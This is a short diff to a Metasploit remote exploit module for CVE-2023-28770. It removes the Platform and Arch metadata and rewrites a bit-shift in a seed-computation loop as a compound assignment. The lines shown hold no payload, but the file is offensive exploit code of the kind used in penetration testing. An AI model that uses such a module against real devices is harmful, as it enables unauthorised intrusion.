@@ -49,8 +49,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://attackerkb.com/topics/tPAvkwQgDK/cve-2023-28770']
         ],
         'DisclosureDate' => '2022-02-01',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
         'Privileged' => true,
         'Targets' => [
           [
@@ -191,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
         else
           found0s += 1
         end
-        power_of_2 = power_of_2 << 1
+        power_of_2 <<= 1
       end
     end
     return seed, round4_array
